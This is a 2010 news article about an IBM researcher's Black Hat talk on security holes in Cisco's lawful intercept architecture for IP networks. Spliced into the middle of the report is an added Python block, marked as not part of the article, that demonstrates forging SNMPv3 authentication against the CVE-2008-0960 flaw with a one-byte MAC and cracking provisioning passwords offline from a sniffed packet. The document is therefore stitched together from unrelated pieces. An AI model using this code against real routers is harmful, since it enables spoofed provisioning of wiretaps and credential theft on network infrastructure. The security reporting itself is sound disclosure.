2/3/2010 01:03 PM

IBM ISS Researcher Exposes Holes In Cisco's Internet Surveillance Architecture

Wiretapping architecture could be abused by individuals under surveillance and outside attackers; Cisco reviews recommended fixes

WASHINGTON, D.C. -- Black Hat DC 2010 -- An IBM ISS researcher here today revealed major security holes in a little-known wiretapping architecture for IP networks created by Cisco Systems for law enforcement. The weaknesses could result in an attacker interfering with legal surveillance or performing some unauthorized surveillance of his own.

Tom Cross, manager of X-Force Research at IBM ISS, says he first came across the Cisco Architecture for Lawful Intercept in IP Networks four years ago. The document, published as IETF RFC 3924 in 2004, is based on the lawful intercept architecture used by the European Telecommunications Standards Institute, and is implemented in Cisco's edge routers and switches -- the 7600, 10000, 12000, and AS5000 series products. Cross says other vendors also have deployed the architecture within their network devices.

Cross says that under the current architecture an alleged criminal could discover that he was under law enforcement surveillance, and could then manipulate or corrupt the information collected or use the surveillance information for nefarious purposes.

Cisco had previously patched an SNMPv3 vulnerability in the router models used in the wiretapping architecture, but Cross says the architecture itself needs some repair, pointing out multiple weaknesses that could be exploited by attackers -- which he says he handed over to Cisco in December 2008.

Jennifer Greeson, communications director at Cisco, who was on hand at Cross' Black Hat presentation, says Cisco has been looking over his recommendations and, perhaps, how to incorporate them.

"We are confident in our framework. That's why we published it: We recognize that security is very important" in this architecture, Greeson says.

Today was the first time Cross -- who says he had to put the effort on the back burner until recently due to other commitments -- has gone public with his research on the wiretapping architecture's weaknesses. Cisco's legal surveillance framework defines the architecture from which the "mediation device" remotely gathers intelligence on behalf of law enforcement from the surveillance target (someone under law enforcement investigation). Vendors such as Digivox, NICE Systems, Verint, and Utimaco make these systems. "The mediation device is the heart of the architecture," Cross says. "It is used by the administrator to provision" the surveillance and sends instructions to the devices that perform the actual surveillance, he says. That information is then reformatted and sent directly to law enforcement, he says.

Cross listed six weaknesses in Cisco's architecture that could lead to security breaches in surveillance: SNMPv3's susceptibility to brute-force credential discovery; a password vulnerability in SNMPv3; the lack of audit trails; the flexibility of the surveillance output stream; the interface's vulnerability to packet spoofing; and the fact that the RFC doesn't require encryption.

While Cisco has patched the SNMPv3 authentication flaw (CVE-2008-0960), that doesn't mean all of its customers have deployed the patch, he warns. Router patching is a particularly onerous process that often loses out to concerns about operational disruption.
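The two SNMPv3 weaknesses at the top of Cross' list, and the authentication flaw behind CVE-2008-0960, can be shown in a few lines. The following is an added example, not code from the article, from Cross' talk or from Cisco: it implements the RFC 3414 password-to-key localization and HMAC-MD5-96 authentication that SNMPv3's User-based Security Model uses, puts a verifier with the pre-patch behaviour (comparing only as many MAC bytes as the sender supplies) beside a correct one, spoofs a message against the weak verifier with a one-byte MAC, and then recovers the provisioning password offline from one captured authenticated message. The engine ID, password, payload and wordlist are constructed for the example; the message is a stand-in for the scopedPDU with msgAuthenticationParameters already zeroed, not a real SNMPv3 encoding.

```python
import hashlib
import hmac

# Constructed sample values (not from the article): a Cisco-style SNMPv3 engine ID
# (enterprise 9, format 3 = MAC address) and the password provisioned on the
# mediation device's SNMPv3 user.
ENGINE_ID = bytes.fromhex("800000090300112233445566")
PASSWORD = b"intercept-2010"
# Stand-in for the authenticated part of an SNMPv3 message, with the
# msgAuthenticationParameters field already zeroed as USM requires before MAC computation.
PAYLOAD = b"SNMPv3 setRequest ciscoTap2MIB stream=7"


def password_to_key_md5(password: bytes, engine_id: bytes) -> bytes:
    """RFC 3414 A.2.1: expand the password to 1 MiB, hash it, then localize to the engine."""
    expanded = (password * (1048576 // len(password) + 1))[:1048576]
    ku = hashlib.md5(expanded).digest()
    return hashlib.md5(ku + engine_id + ku).digest()  # Kul = MD5(Ku || engineID || Ku)


def hmac_md5_96(key: bytes, payload: bytes) -> bytes:
    """usmHMACMD5AuthProtocol: the first 12 bytes of HMAC-MD5 over the message."""
    return hmac.new(key, payload, hashlib.md5).digest()[:12]


def verify_vulnerable(key: bytes, payload: bytes, auth_param: bytes) -> bool:
    """Behaviour fixed by CVE-2008-0960: the receiver trusts the sender's MAC length and
    compares only that many bytes, so a 1-byte parameter is forgeable in at most 256 tries."""
    if not 1 <= len(auth_param) <= 12:
        return False
    return hmac_md5_96(key, payload)[:len(auth_param)] == auth_param


def verify_fixed(key: bytes, payload: bytes, auth_param: bytes) -> bool:
    """Correct check: exactly 12 MAC bytes, compared in constant time."""
    if len(auth_param) != 12:
        return False
    return hmac.compare_digest(hmac_md5_96(key, payload), auth_param)


def forge_one_byte_mac(check):
    """Spoof an authenticated message without knowing the key by brute-forcing a 1-byte
    msgAuthenticationParameters. check(auth_param) -> bool plays the receiving router.
    Returns the number of attempts needed, or None if the receiver never accepts."""
    for b in range(256):
        if check(bytes([b])):
            return b + 1
    return None


def crack_password(engine_id: bytes, payload: bytes, auth_param: bytes, wordlist):
    """Offline credential discovery from one captured authenticated packet: localize each
    candidate password to the engine and recompute the MAC until one matches."""
    for candidate in wordlist:
        if verify_fixed(password_to_key_md5(candidate, engine_id), payload, auth_param):
            return candidate
    return None


def rfc3414_vector_ok() -> bool:
    """Self-check against the RFC 3414 A.3.1 password-to-key test vector (MD5)."""
    kul = password_to_key_md5(b"maplesyrup", bytes.fromhex("000000000000000000000002"))
    return kul.hex() == "526f5eed9fcce26f8964c2930787d82b"


if __name__ == "__main__":
    key = password_to_key_md5(PASSWORD, ENGINE_ID)
    tag = hmac_md5_96(key, PAYLOAD)
    print("RFC 3414 vector:", rfc3414_vector_ok())
    print("forge vs vulnerable verifier, attempts:",
          forge_one_byte_mac(lambda p: verify_vulnerable(key, PAYLOAD, p)))
    print("forge vs fixed verifier:",
          forge_one_byte_mac(lambda p: verify_fixed(key, PAYLOAD, p)))
    words = [b"cisco", b"public", b"intercept-2010", b"lawful"]  # constructed wordlist
    print("offline dictionary attack recovers:",
          crack_password(ENGINE_ID, PAYLOAD, tag, words))
```

Two things are worth noticing when running it. The forgery needs no key at all and at most 256 packets against the unpatched verifier, which is why an unpatched router on the lawful intercept path can be provisioned by anyone who can reach its SNMP port; and the dictionary attack works against a fully patched router, because the key is derived deterministically from the password and the public engine ID, so a weak provisioning password is recoverable from a single sniffed packet. That is the reason Cross' advice below to encrypt the management path with IPsec and keep it out of band matters even after CVE-2008-0960 is fixed.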

Even so, Cross says the biggest issues are architectural ones that must be fixed by Cisco and the IETF. "These are harder problems that require more thought," he says.

"My greatest concern is the lack of audit trails," he says. An attacker can "turn off" the audit trail, for instance, leaving the victim organization unaware of the activity. Attacks on routers that haven't patched for the SNMPv3 authentication flaw could easily be tracked with traps that monitor for these attacks, according to Cross.

Cross says Cisco's configuration guide for the architecture recommends that network administrators enable SNMP trap notifications to detect potential threats on SNMPv3 authentication, and it "implies" that traps will be sent for packets that carry an incorrect authentication key or any other packet that isn't part of the approved access list.

"I tested this, and there were no authentication traps. So I sent this to Cisco and said it didn't work," Cross says. "Cisco said the implementation was right, but the documentation was wrong [and rewrote the documentation]. So now it no longer says traps are generated.

"But a network administrator would want to know if his network was under attack."

Cross' recommendations to Cisco and the IETF include using a different transport for surveillance provisioning, such as SNMP over TCP, which would be less prone to spoofing; limiting the addresses to which the output stream can be sent; and moving notification control into the router configuration so that network administrators won't be able to monitor surveillance or interfere with it.

ISPs should not only patch their law-enforcement surveillance deployments for the SNMPv3 flaw, but also use encryption -- namely IPsec, Cross says. Assigning user-group IP access control lists can help bind the authorized user of the lawful intercept function to the proper mediation device, he says. "Also, build out-of-band management networks," he says.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...
